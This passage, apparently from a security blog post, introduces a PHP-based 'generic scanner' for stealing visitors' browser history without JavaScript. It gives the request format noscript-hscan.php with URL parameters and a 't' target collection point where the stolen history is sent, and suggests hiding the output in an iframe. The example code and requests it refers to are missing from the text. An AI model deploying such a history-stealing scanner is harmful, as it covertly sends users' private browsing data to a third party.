Still, I think that RSnake's approach is quite interesting and innovative. I decided to write a generic scanner that can be configured on the fly to steal any browser history. The scanner is located here. Before using it you need to pass several GET or POST (it is up to you really) parameters to the script like this:
noscript-hscan.php?u1=[url]&u2=[url]&t=[target collection point]
The scanner excepts any number of URLs. The only rule is that every URL parameters must start with u (lower case u). It is a good practice to number the URLs that you want to scan as u1, u2, u3, etc. The t parameter is for the target collection point. This is the place where the history information will be sent to. The collection point will receive requests that look like the following:
The easiest way you can launch the generated scanning code is to include it inside an iframe. For example you can use something like the following:
This is it! It is simple.